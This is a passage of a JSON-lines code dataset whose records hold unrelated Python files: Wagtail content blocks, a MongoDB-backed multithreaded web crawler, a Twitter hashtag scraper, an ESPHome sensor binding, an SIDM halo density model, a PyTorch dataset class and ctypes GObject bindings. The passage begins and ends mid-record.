__init__(self,): \n\t\t_RUMP.__init__(self)\n\t\tself.name = \"RUMPS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"rump\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_rumps.py","file_name":"_rumps.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"46365487","text":"from wagtail.wagtailcore.blocks import CharBlock\nfrom wagtail.wagtailcore.blocks import ChoiceBlock\nfrom wagtail.wagtailcore.blocks import StructBlock\nfrom wagtail.wagtailimages.blocks import ImageChooserBlock\nfrom .StructBlockWithStyle import StructBlockWithStyle\n\nIMAGE_STYLE_CHOICES = [\n ('max-width:225px;max-height:145px', 'Small'),\n ('max-width:225px;max-height:145px;padding-top:20px',\n 'Small Pushed Down 20px'),\n ('max_width:250px;max-height:250px', 'Medium'),\n ('max_width:250px;max-height:250px;padding-top:20px',\n 'Medium Pushed Down 20px'),\n ('height:auto', 'Shrink to Fit'),\n]\n\n\nclass COSPhotoStreamBlock(StructBlock):\n\n class Meta:\n template = 'common/blocks/flickr.html'\n icon = 'image'\n label = 'Photo Stream'\n\n\nclass ImageBlock(StructBlock):\n main_image = ImageChooserBlock()\n style = ChoiceBlock(choices=IMAGE_STYLE_CHOICES, default=\"height:auto\")\n url = CharBlock(max_length=250, required=False)\n\n class Meta:\n template = 'common/blocks/image_custom_block.html'\n icon = 'image'\n label = 'Image'\n\n\nclass CustomImageBlock(StructBlockWithStyle):\n\n main_image = ImageChooserBlock()\n url = CharBlock(max_length=250, required=False)\n\n class Meta:\n template = 'common/blocks/image_free_custom_block.html'\n icon = 'image'\n label = 'CustomImage'\n","sub_path":"common/blocks/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"260644710","text":"import time\nimport urllib.parse as urlparse\nimport threading\nimport multiprocessing\nfrom . import utils\nfrom . import db_cache\nfrom datetime import datetime, timedelta\nfrom pymongo import MongoClient, errors\n\nSLEEP_TIME = 1\n\n\n\nclass MongoQueue:\n \"\"\"\n >>> timeout = 1\n >>> url = 'http://example.webscraping.com'\n >>> q = MongoQueue(timeout=timeout)\n >>> q.clear() # ensure empty queue\n >>> q.push(url) # add test URL\n >>> q.peek() == q.pop() == url # pop back this URL\n True\n >>> q.repair() # immediate repair will do nothing\n >>> q.pop() # another pop should be empty\n >>> q.peek() \n >>> import time; time.sleep(timeout) # wait for timeout\n >>> q.repair() # now repair will release URL\n Released: test\n >>> q.pop() == url # pop URL again\n True\n >>> bool(q) # queue is still active while outstanding\n True\n >>> q.complete(url) # complete this URL\n >>> bool(q) # queue is not complete\n False\n \"\"\"\n\n # possible states of a download\n OUTSTANDING, PROCESSING, COMPLETE = range(3)\n\n def __init__(self, client=None, timeout=300):\n \"\"\"\n host: the host to connect to MongoDB\n port: the port to connect to MongoDB\n timeout: the number of seconds to allow for a timeout\n \"\"\"\n self.client = MongoClient() if client is None else client\n self.db = self.client.cache\n self.timeout = timeout\n\n def __nonzero__(self):\n \"\"\"Returns True if there are more jobs to process\n \"\"\"\n record = self.db.crawl_queue.find_one(\n {'status': {'$ne': self.COMPLETE}} \n )\n return True if record else False\n\n def push(self, url):\n \"\"\"Add new URL to queue if does not exist\n \"\"\"\n try:\n self.db.crawl_queue.insert({'_id': url, 'status': self.OUTSTANDING})\n except errors.DuplicateKeyError as e:\n pass # this is already in the queue\n\n def pop(self):\n \"\"\"Get an outstanding URL from the queue and set its status to processing.\n If the queue is empty a KeyError exception is raised.\n \"\"\"\n record = self.db.crawl_queue.find_and_modify(\n query={'status': self.OUTSTANDING}, \n update={'$set': {'status': self.PROCESSING, 'timestamp': datetime.now()}}\n )\n if record:\n return record['_id']\n else:\n self.repair()\n raise KeyError()\n\n def peek(self):\n record = self.db.crawl_queue.find_one({'status': self.OUTSTANDING})\n if record:\n return record['_id']\n\n def complete(self, url):\n self.db.crawl_queue.update({'_id': url}, {'$set': {'status': self.COMPLETE}})\n\n def repair(self):\n \"\"\"Release stalled jobs\n \"\"\"\n record = self.db.crawl_queue.find_and_modify(\n query={\n 'timestamp': {'$lt': datetime.now() - timedelta(seconds=self.timeout)},\n 'status': {'$ne': self.COMPLETE}\n },\n update={'$set': {'status': self.OUTSTANDING}}\n )\n if record:\n print('Released:', record['_id'])\n\n def clear(self):\n self.db.crawl_queue.drop()\n\ndef threaded_crawler1(seed_url, delay=5, cache=None, scrape_callback=None, user_agent='wswp', proxies=None, num_retries=1, max_threads=10, timeout=60):\n \"\"\"Crawl using multiple threads\n \"\"\"\n print(\"started\")\n # the queue of URL's that still need to be crawled\n crawl_queue = MongoQueue()\n crawl_queue.clear()\n crawl_queue.push(seed_url)\n cache = db_cache.DBCache()\n D = utils.Downloader(cache=cache, delay=delay, user_agent=user_agent, proxies=proxies, num_retries=num_retries, timeout=timeout)\n\n def process_queue():\n while True:\n # keep track that are processing url\n try:\n url = crawl_queue.pop()\n except KeyError:\n # currently no urls to process\n break\n else:\n html = D(url)\n if scrape_callback:\n try:\n links = scrape_callback(url, html) or []\n except Exception as e:\n print('Error in callback for: {}: {}'.format(url, e))\n else:\n for link in links:\n # add this new link to queue\n crawl_queue.push(utils.normalize(seed_url, link))\n crawl_queue.complete(url)\n\n\n # wait for all download threads to finish\n threads = []\n while threads or crawl_queue:\n for thread in threads:\n if not thread.is_alive():\n threads.remove(thread)\n while len(threads) < max_threads and crawl_queue.peek():\n # can start some more threads\n thread = threading.Thread(target=process_queue)\n thread.setDaemon(True) # set daemon so main thread can exit when receives ctrl-c\n thread.start()\n threads.append(thread)\n time.sleep(SLEEP_TIME)\n\n\ndef process_crawler(args, **kwargs):\n num_cpus = multiprocessing.cpu_count()\n #pool = multiprocessing.Pool(processes=num_cpus)\n print('Starting {} processes'.format(num_cpus))\n processes = []\n for i in range(num_cpus):\n p = multiprocessing.Process(target=threaded_crawler1, args=[args], kwargs=kwargs)\n #parsed = pool.apply_async(threaded_link_crawler, args, kwargs)\n p.start()\n processes.append(p)\n # wait for processes to complete\n for p in processes:\n p.join()","sub_path":"common/process_crawler.py","file_name":"process_crawler.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"491135762","text":"from twitterscraper import query_tweets\nimport datetime as dt\nimport pandas as pd\n\n# create list of hashtags in which to query tweets\nhashtags = ['samsunggalaxy', 'samsungunpacked', '#galaxyunpacked', '#galaxyS20',\n '#galaxyS10', '#galaxyS9', '#galaxyS8', '#unpacked2020', '#galaxyzflip',\n '#galaxyfold']\n\n# create lists of start and end dates to collect tweets at each point of the event\nbegin_date = [dt.date(2020,1,28), dt.date(2019,2,6), dt.date(2018,2,11),\n dt.date(2017,3,15)]\nend_date = [dt.date(2020,2,25), dt.date(2019,3,6), dt.date(2018,3,11),\n dt.date(2017,4,12)]\nlimit = 10000\nlang = 'english'\n\nall_frames = []\nfor i, hashtag in enumerate(hashtags):\n frames = []\n for x, date in enumerate(begin_date):\n try:\n tweets = query_tweets(hashtag, begindate=begin_date[x],\n enddate=end_date[x], limit=limit, lang=lang)\n df = pd.DataFrame(t.__dict__ for t in tweets)\n frames.append(df)\n except:\n pass\n all_frames.append(pd.concat(frames))\n print(f'Completed {i + 1} of {len(hashtags)} iterations...')\n\ntweets_df = pd.concat(all_frames)\ntweets_df.to_pickle(\"scraped_tweets.pkl\")","sub_path":"tweets_scrape.py","file_name":"tweets_scrape.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"270895337","text":"import esphome.codegen as cg\nimport esphome.config_validation as cv\nfrom esphome.components import binary_sensor\nfrom esphome.const import CONF_CHANNEL, CONF_ID\nfrom . import ttp229_bsf_ns, TTP229BSFComponent, CONF_TTP229_ID\n\nDEPENDENCIES = ['ttp229_bsf']\nTTP229BSFChannel = ttp229_bsf_ns.class_('TTP229BSFChannel', binary_sensor.BinarySensor)\n\nCONFIG_SCHEMA = binary_sensor.BINARY_SENSOR_SCHEMA.extend({\n cv.GenerateID(): cv.declare_id(TTP229BSFChannel),\n cv.GenerateID(CONF_TTP229_ID): cv.use_id(TTP229BSFComponent),\n cv.Required(CONF_CHANNEL): cv.int_range(min=0, max=15),\n})\n\n\ndef to_code(config):\n var = cg.new_Pvariable(config[CONF_ID])\n yield binary_sensor.register_binary_sensor(var, config)\n\n cg.add(var.set_channel(config[CONF_CHANNEL]))\n hub = yield cg.get_variable(config[CONF_TTP229_ID])\n cg.add(hub.register_channel(var))\n","sub_path":"esphome/components/ttp229_bsf/binary_sensor.py","file_name":"binary_sensor.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"370471379","text":"import numpy as np\nfrom scipy.optimize import fsolve\nfrom scipy.optimize import root\nfrom functions import rho_isothermal, M_isothermal, find_r1, \\\n find_nfw, rho_joint_profiles, find_rho0, tage\n\ndef sidm_halo_model(r, N0, v0, sigma0):\n \"\"\"\n Calculates density profile for an SIDM halo\n assuming a truncation between an isothermal profile\n and an NFW profile at radius r1.\n\n Args:\n x : values over which the data/model is defined (radius, ri)\n N0 : Number of scatterings per particle [no units]\n v0 : 1D velocity dispersion [units km/s]\n sigma0 : cross section per unit mass [units cm^2/g]\n \"\"\"\n Msun_in_cgs = 1.98848e33\n kpc_in_cgs = 3.08567758e21\n\n t_age = 7.5\n #t_age = tage(logM200) # Gyr\n rho0 = find_rho0(N0, t_age, v0, sigma0)\n t_age_cgs = t_age * 1e9 * 365.24 * 24 * 3600 # sec\n rho0_cgs = rho0 * Msun_in_cgs / kpc_in_cgs ** 3 # g/cm^3\n\n G = 4.3e-6 # kpc km^2 Msun^-1 s^-2\n r0 = v0**2 / (4. * np.pi * G * rho0)\n r0 = np.sqrt(r0) # kpc\n\n sol = fsolve(find_r1, 20, args=(rho0_cgs, v0, t_age_cgs, sigma0))\n r1 = sol[0] * r0 # kpc\n\n M1 = M_isothermal(r1, r0, rho0) # Msun\n rho1 = rho0 * rho_isothermal( r1/r0 ) # Msun /kpc^3\n\n sol = root(find_nfw, [1, np.log10(rho0)], args=(r1, np.log10(rho1), np.log10(M1)),\n method='hybr', tol=1e-4)\n\n rs = sol.x[0]\n rhos = 10**sol.x[1]\n if rs < 0: rs = 1\n\n rho = rho_joint_profiles(r, r1, r0, rho0, rs, rhos)\n return np.log10(rho)\n\n\n\n","sub_path":"tests/discard_chains/sidm_model.py","file_name":"sidm_model.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"196225873","text":"# coding=utf-8\nimport configparser\nimport os\n\nclass Config:\n\n def __init__(self):\n _basedir = os.path.abspath(os.path.dirname(__file__))\n # pitop 配置文件\n sys_conf = os.path.join(_basedir, '../sys.conf')\n cf = configparser.ConfigParser()\n cf.read(sys_conf)\n self.cf = cf\n\n def read(self, key, value):\n return str(self.cf.get(key, value))\n","sub_path":"tools/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"543458030","text":"from torch.utils.data import Dataset\nimport torch\nfrom PIL import Image\nimport numpy as np\nimport os\nimport math\n\nfrom csv import DictReader\n\nclass MyDataset(Dataset):\n def __init__(self, version='it6',split='train', joint_transform=None, img_transform=None, url_csv_file=None, file_suffix=None):\n\n super().__init__()\n self.joint_transform = joint_transform\n self.img_transform = img_transform\n self.split = split\n self.images = []\n self.targets = [] \n self.version = '_'+version if split == 'train' else ''\n \n # LOAD SPLIT CSV FILE\n \n self.root_dir = url_csv_file\n with open(self.root_dir + self.split + file_suffix + self.version+ '.csv') as f:\n csv_file = DictReader(f)\n for row in csv_file:\n self.images.append(row[\"image_urls\"])\n self.targets.append(row[\"target_urls\"])\n\n \n \n def __len__(self):\n return len(self.images)\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: (image, target)\n \"\"\"\n image = Image.open(self.images[index]) #.convert('RGB') \n target = Image.open(self.targets[index])\n \n # Convertir la PIL image a un tensor manualmente para que no haga la normalizacion \n if self.joint_transform is not None:\n image, target = self.joint_transform(image,target)\n target = torch.from_numpy(np.array(target))\n if self.img_transform is not None:\n image = self.img_transform(image)\n \n return image, target","sub_path":"Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"567034587","text":"# Copyright, John Rusnak, 2012\n # This code binding is available under the license agreement of the LGPL with\n # an additional constraint described below,\n # and with the understanding that the webkit API is copyright protected\n # by Apple Computer, Inc. (see below).\n # There is an additional constraint that any derivatives of this work aimed\n # at providing bindings to GObject, GTK, GDK, or WebKit be strictly\n # python-only bindings with no native code.\n # * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY\n # * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n # * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n # * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE COMPUTER, INC. OR\n # * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n # * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n # * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n # * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\n # * OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n # * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n # * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n #\n # ******************************************************\n # For the API:\n # /*\n # * Copyright (C) 2006 Apple Computer, Inc. All rights reserved.\n # *\n # * Redistribution and use in source and binary forms, with or without\n # * modification, are permitted provided that the following conditions\n # * are met:\n # * 1. Redistributions of source code must retain the above copyright\n # * notice, this list of conditions and the following disclaimer.\n # * 2. Redistributions in binary form must reproduce the above copyright\n # * notice, this list of conditions and the following disclaimer in the\n # * documentation and/or other materials provided with the distribution.\n # *\n # * THIS SOFTWARE IS PROVIDED BY APPLE COMPUTER, INC. ``AS IS'' AND ANY\n # * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n # * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n # * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE COMPUTER, INC. OR\n # * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n # * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n # * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n # * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\n # * OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n # * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n # * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n # */\nfrom ctypes import *\nfrom gtk3_types import *\nfrom gobject_types import *\n \n \n\"\"\"Derived Pointer Types\"\"\"\n__GtkRcStyle = POINTER(c_int)\n__GdkGeometry = POINTER(c_int)\n_WebKitNetworkResponse = POINTER(c_int)\n_GdkPixbuf = POINTER(c_int)\n__GtkRequisition = POINTER(c_int)\n_GtkRcStyle = POINTER(c_int)\n__GtkRegionFlags = POINTER(c_int)\n__WebKitDOMNode = POINTER(c_int)\n_GtkWindow = POINTER(c_int)\n__cairo_font_options_t = POINTER(c_int)\n__JSValue = POINTER(c_int)\n_JSContext = POINTER(c_int)\n_GtkIconFactory = POINTER(c_int)\n__GdkAtom = POINTER(c_int)\n__GdkTimeCoord = POINTER(c_int)\n_GdkColor = POINTER(c_int)\n__GtkWidgetPath = POINTER(c_int)\n__GClosure = POINTER(c_int)\n__GMainContext = POINTER(c_int)\n_GdkDisplay = POINTER(c_int)\n__GtkStyleProvider = POINTER(c_int)\n_GtkDialog = POINTER(c_int)\n__WebKitWebWindowFeatures = POINTER(c_int)\n_JSObject = POINTER(c_int)\n_GBytes = POINTER(c_int)\n_GScanner = POINTER(c_int)\n_PangoFont = POINTER(c_int)\n_GtkStyleContext = POINTER(c_int)\n_GMainContext = POINTER(c_int)\n__GtkTextBuffer = POINTER(c_int)\n_GtkTargetList = POINTER(c_int)\n__WebKitWebSettings = POINTER(c_int)\n_GdkAppLaunchContext = POINTER(c_int)\n__GObject = POINTER(c_int)\n__PangoLayout = POINTER(c_int)\n_WebKitWebBackForwardList = POINTER(c_int)\n_GtkOffscreenWindow = POINTER(c_int)\n__GParamSpec = POINTER(c_int)\n__PangoAttrIterator = POINTER(c_int)\n_GtkIconSet = POINTER(c_int)\n_GtkSelectionData = POINTER(c_int)\n_GtkWindowGroup = POINTER(c_int)\n_JSGlobalContext = POINTER(c_int)\n_PangoLogAttr = POINTER(c_int)\n__PangoContext = POINTER(c_int)\n__JSPropertyNameArray = POINTER(c_int)\n_WebKitWebSettings = POINTER(c_int)\n__PangoFont = POINTER(c_int)\n__GtkPathPriorityType = POINTER(c_int)\n__JSClass = POINTER(c_int)\n__WebKitWebHistoryItem = POINTER(c_int)\n_JSValue = POINTER(c_int)\n__GtkSettings = POINTER(c_int)\n_GSource = POINTER(c_int)\n__PangoFontMap = POINTER(c_int)\n__JSString = POINTER(c_int)\n__PangoAttrList = POINTER(c_int)\n_PangoMatrix = POINTER(c_int)\n__GSource = POINTER(c_int)\n_GtkApplication = POINTER(c_int)\n__PangoAnalysis = POINTER(c_int)\n_PangoFontDescription = POINTER(c_int)\n__GdkCursor = POINTER(c_int)\n_GtkBorder = POINTER(c_int)\n_WebKitWebInspector = POINTER(c_int)\n_GOptionGroup = POINTER(c_int)\n__GScanner = POINTER(c_int)\n__GtkWidgetClass = POINTER(c_int)\n__GdkEventKey = POINTER(c_int)\n__GdkDisplay = POINTER(c_int)\n_GtkWidgetPath = POINTER(c_int)\n_GdkScreen = POINTER(c_int)\n_PangoFontMetrics = POINTER(c_int)\n_GdkVisual = POINTER(c_int)\n_PangoFontMap = POINTER(c_int)\n_GSList = POINTER(c_int)\n_WebKitWebFrame = POINTER(c_int)\n_JSString = POINTER(c_int)\n_GtkWidget = POINTER(c_int)\n__WebKitNetworkRequest = POINTER(c_int)\n__GdkWindow = POINTER(c_int)\n__PangoFontFamily = POINTER(c_int)\n__JSContextGroup = POINTER(c_int)\n__GPollFD = POINTER(c_int)\n__cairo_region_t = POINTER(c_int)\n_PangoFontset = POINTER(c_int)\n_GdkWindow = POINTER(c_int)\n__PangoFontDescription = POINTER(c_int)\n__GtkBorder = POINTER(c_int)\n__GError = POINTER(c_int)\n__PangoCoverage = POINTER(c_int)\n_WebKitViewportAttributes = POINTER(c_int)\n_JSClass = POINTER(c_int)\n_WebKitWebHistoryItem = POINTER(c_int)\n__cairo_t = POINTER(c_int)\n__GWeakRef = POINTER(c_int)\n__GdkVisual = POINTER(c_int)\n__GdkEventButton = POINTER(c_int)\n_GdkDevice = POINTER(c_int)\n__PangoRectangle = POINTER(c_int)\n__GtkAccelGroup = POINTER(c_int)\n_GObject = POINTER(c_int)\n__GtkIconSource = POINTER(c_int)\n__JSContext = POINTER(c_int)\n_PangoFontsetSimple = POINTER(c_int)\n__GtkAllocation = POINTER(c_int)\n__GtkWidget = POINTER(c_int)\n_PangoLayoutLine = POINTER(c_int)\n__GtkIconSet = POINTER(c_int)\n_WebKitWebView = POINTER(c_int)\n__PangoTabArray = POINTER(c_int)\n_WebKitHitTestResult = POINTER(c_int)\n__GValue = POINTER(c_int)\n_GdkDeviceManager = POINTER(c_int)\n_GdkCursor = POINTER(c_int)\n_WebKitDOMDocument = POINTER(c_int)\n__PangoMatrix = POINTER(c_int)\n__GtkPrintOperation = POINTER(c_int)\n_PangoContext = POINTER(c_int)\n__GList = POINTER(c_int)\n__WebKitWebView = POINTER(c_int)\n_WebKitWebWindowFeatures = POINTER(c_int)\n_PangoCoverage = POINTER(c_int)\n_GParamSpec = POINTER(c_int)\n_GList = POINTER(c_int)\n__GdkRGBA = POINTER(c_int)\n__GTimeVal = POINTER(c_int)\n__GSourceFuncs = POINTER(c_int)\n__JSPropertyNameAccumulator = POINTER(c_int)\n__PangoGlyphString = POINTER(c_int)\n__JSGlobalContext = POINTER(c_int)\n_WebKitSecurityOrigin = POINTER(c_int)\n__GObjectClass = POINTER(c_int)\n__GSList = POINTER(c_int)\n_PangoAnalysis = POINTER(c_int)\n__GdkWindowAttr = POINTER(c_int)\n_SoupMessage = POINTER(c_int)\n_WebKitWebDataSource = POINTER(c_int)\n__GdkColor = POINTER(c_int)\n_JSContextGroup = POINTER(c_int)\n__GdkRectangle = POINTER(c_int)\n__PangoLanguage = POINTER(c_int)\n_PangoAttrList = POINTER(c_int)\n__gunichar = POINTER(c_int)\n__GdkWMDecoration = POINTER(c_int)\n__PangoLogAttr = POINTER(c_int)\n_PangoLayout = POINTER(c_int)\n_JSPropertyNameArray = POINTER(c_int)\n__JSObject = POINTER(c_int)\n_WebKitWebNavigationAction = POINTER(c_int)\n_GtkStyle = POINTER(c_int)\n__GParameter = POINTER(c_int)\n__GtkStyle = POINTER(c_int)\n__GIcon = POINTER(c_int)\n__GtkWindow = POINTER(c_int)\n_PangoLayoutRun = POINTER(c_int)\n__cairo_pattern_t = POINTER(c_int)\n__GdkPixbuf = POINTER(c_int)\n_WebKitGeolocationPolicyDecision = POINTER(c_int)\n_GtkSettings = POINTER(c_int)\n__GSourceCallbackFuncs = POINTER(c_int)\n__GtkTargetEntry = POINTER(c_int)\n__GtkApplication = POINTER(c_int)\n_GtkClipboard = POINTER(c_int)\n_GByteArray = POINTER(c_int)\n__GdkScreen = POINTER(c_int)\n_PangoLanguage = POINTER(c_int)\n__GdkDevice = POINTER(c_int)\n_PangoTabArray = POINTER(c_int)\n\"\"\"Enumerations\"\"\"\nPangoStyle = c_int\nPangoWeight = c_int\nPangoVariant = c_int\nPangoStretch = c_int\nPangoFontMask = c_int\nGtkWidgetHelpType = c_int\nGtkTextDirection = c_int\nGtkSizeRequestMode = c_int\nGtkAlign = c_int\nGdkPixbufError = c_int\nGdkColorspace = c_int\nGdkPixbufAlphaMode = c_int\nGtkIconSize = c_int\nGdkWindowType = c_int\nGdkWindowWindowClass = c_int\nGdkWindowHints = c_int\nGdkGravity = c_int\nGdkWindowEdgeh = c_int\nGdkWindowTypeHint = c_int\nGdkWindowAttributesType = c_int\nGdkFilterReturn = c_int\nGdkModifierType = c_int\nGdkWMDecoration = c_int\nGdkWMFunction = c_int\nGdkInputSource = c_int\nGdkInputMode = c_int\nGdkAxisUse = c_int\nGdkDeviceType = c_int\nGdkGrabOwnership = c_int\nGdkCursorType = c_int\nGdkVisualType = c_int\nGdkByteOrder = c_int\nGtkRcFlags = c_int\nGtkRcTokenType = c_int\nPangoWrapMode = c_int\nPangoEllipsizeMode = c_int\nPangoAlignment = c_int\nWebKitLoadStatus = c_int\nWebKitNavigationResponse = c_int\nWebKitWebViewTargetInfo = c_int\nWebKitWebViewViewMode = c_int\nWebKitEditingBehavior = c_int\nGdkInputSource = c_int\nGdkInputMode = c_int\nGdkAxisUse = c_int\nGdkDeviceType = c_int\nGdkGrabOwnership = c_int\nGtkDialogFlags = c_int\nGtkResponseType = c_int\nWebKitWebNavigationReason = c_int\nPangoWrapMode = c_int\nPangoEllipsizeMode = c_int\nPangoAlignment = c_int\n\nimport gobject__GObject\nclass GSource( gobject__GObject.GObject):\n \"\"\"Class GSource Constructors\"\"\"\n def __init__( self, struct_size, obj = None):\n if obj: self._object = obj\n else:\n libgobject.g_source_new.restype = POINTER(c_int)\n \n libgobject.g_source_new.argtypes = [guint]\n self._object = libgobject.g_source_new(struct_size, )\n\n \"\"\"Methods\"\"\"\n def remove_poll( self, fd, ):\n if fd: fd = fd._object\n else: fd = POINTER(c_int)()\n\n libgobject.g_source_remove_poll.argtypes = [_GSource,_GPollFD]\n \n libgobject.g_source_remove_poll( self._object,fd )\n\n def set_callback_indirect( self, callback_data, callback_funcs, ):\n if callback_funcs: callback_funcs = callback_funcs._object\n else: callback_funcs = POINTER(c_int)()\n\n libgobject.g_source_set_callback_indirect.argtypes = [_GSource,gpointer,_GSourceCallbackFuncs]\n \n libgobject.g_source_set_callback_indirect( self._object,callback_data,callback_funcs )\n\n def destroy( self, ):\n\n libgobject.g_source_destroy.argtypes = [_GSource]\n \n libgobject.g_source_destroy( self._object )\n\n def get_id( self, ):\n\n libgobject.g_source_get_id.restype = guint\n libgobject.g_source_get_id.argtypes = [_GSource]\n \n return libgobject.g_source_get_id( self._object )\n\n def get_context( self, ):\n\n libgobject.g_source_get_context.restype = _GMainContext\n libgobject.g_source_get_context.argtypes = [_GSource]\n from gobject import GMainContext\n return GMainContext(None,None, obj=libgobject.g_source_get_context( self._object ) or POINTER(c_int)())\n\n def set_can_recurse( self, can_recurse, ):\n\n libgobject.g_source_set_can_recurse.argtypes = [_GSource,gboolean]\n \n libgobject.g_source_set_can_recurse( self._object,can_recurse )\n\n def get_name( self, ):\n\n libgobject.g_source_get_name.restype = c_char_p\n libgobject.g_source_get_name.argtypes = [_GSource]\n \n return libgobject.g_source_get_name( self._object )\n\n def get_priority( self, ):\n\n libgobject.g_source_get_priority.restype = gint\n libgobject.g_source_get_priority.argtypes = [_GSource]\n \n return libgobject.g_source_get_priority( self._object )\n\n def ref( self, ):\n\n libgobject.g_source_ref.restype = _GSource\n libgobject.g_source_ref.argtypes = [_GSource]\n from gobject import GSource\n return GSource( obj=libgobject.g_source_ref( self._object ) or POINTER(c_int)())\n\n def remove_child_source( self, child_source, ):\n if child_source: child_source = child_source._object\n else: child_source = POINTER(c_int)()\n\n libgobject.g_source_remove_child_source.argtypes = [_GSource,_GSource]\n \n libgobject.g_source_remove_child_source( self._object,child_source )\n\n def add_child_source( self, child_source, ):\n if child_source: child_source = child_source._object\n else: child_source = POINTER(c_int)()\n\n libgobject.g_source_add_child_source.argtypes = [_GSource,_GSource]\n \n libgobject.g_source_add_child_source( self._object,child_source )\n\n def set_name( self, name, ):\n\n libgobject.g_source_set_name.argtypes = [_GSource,c_char_p]\n \n libgobject.g_source_set_name( self._object,name )\n\n def get_can_recurse( self, ):\n\n libgobject.g_source_get_can_recurse.restype = gboolean\n libgobject.g_source_get_can_recurse.argtypes = [_GSource]\n \n return libgobject.g_source_get_can_recurse( self._object )\n\n def get_current_time( self, timeval, ):\n if timeval: timeval = timeval._object\n else: timeval = POINTER(c_int)()\n\n libgobject.g_source_get_current_time.argtypes = [_GSource,_GTimeVal]\n \n libgobject.g_source_get_current_time( self._object,timeval )\n\n def is_destroyed( self, ):\n\n libgobject.g_source_is_destroyed.restype = gboolean\n libgobject.g_source_is_destroyed.argtypes = [_GSource]\n \n return libgobject.g_source_is_destroyed( self._object )\n\n def unref( self, ):\n\n libgobject.g_source_unref.argtypes = [_GSource]\n \n libgobject.g_source_unref( self._object )\n\n def add_poll( self, fd, ):\n if fd: fd = fd._object\n else: fd = POINTER(c_int)()\n\n libgobject.g_source_add_poll.argtypes = [_GSource,_GPollFD]\n \n libgobject.g_source_add_poll( self._object,fd )\n\n def set_priority( self, priority, ):\n\n libgobject.g_source_set_priority.argtypes = [_GSource,gint]\n \n libgobject.g_source_set_priority( self._object,priority )\n\n def set_funcs( self, funcs, ):\n if funcs: funcs = funcs._object\n else: funcs = POINTER(c_int)()\n\n libgobject.g_source_set_funcs.argtypes = [_GSource,_GSourceFuncs]\n \n libgobject.g_source_set_funcs( self._object,funcs )\n\n def get_time( self, ):\n\n libgobject.g_source_get_time.restype = gint64\n libgobject.g_source_get_time.argtypes = [_GSource]\n \n return libgobject.g_source_get_time( self._object )\n\n def set_name_by_id( self, tag, name, ):\n\n libgobject.g_source_set_name_by_id.argtypes = [_GSource,guint,c_char_p]\n \n libgobject.g_source_set_name_by_id( self._object,tag,name )\n\n def set_callback( self, func, data, notify, ):\n\n libgobject.g_source_set_callback.argtypes = [_GSource,GSourceFunc,gpointer,GDestroyNotify]\n \n libgobject.g_source_set_callback( self._object,func,data,notify )\n\n def attach( self, context, ):\n if context: context = context._object\n else: context = POINTER(c_int)()\n\n libgobject.g_source_attach.restype = guint\n libgobject.g_source_attach.argtypes = [_GSource,_GMainContext]\n \n return libgobject.g_source_attach( self._object,context )\n\n @staticmethod\n def remove_by_user_data( user_data,):\n libgobject.g_source_remove_by_user_data.restype = gboolean\n libgobject.g_source_remove_by_user_data.argtypes = [gpointer]\n \n return libgobject.g_source_remove_by_user_data(user_data, )\n\n @staticmethod\n def remove( tag,):\n libgobject.g_source_remove.restype = gboolean\n libgobject.g_source_remove.argtypes = [guint]\n \n return libgobject.g_source_remove(tag, )\n\n @staticmethod\n def remove_by_funcs_user_data( funcs, user_data,):\n if funcs: funcs = funcs._object\n else: funcs = POINTER(c_int)()\n libgobject.g_source_remove_by_funcs_user_data.restype = gboolean\n libgobject.g_source_remove_by_funcs_user_data.argtypes = 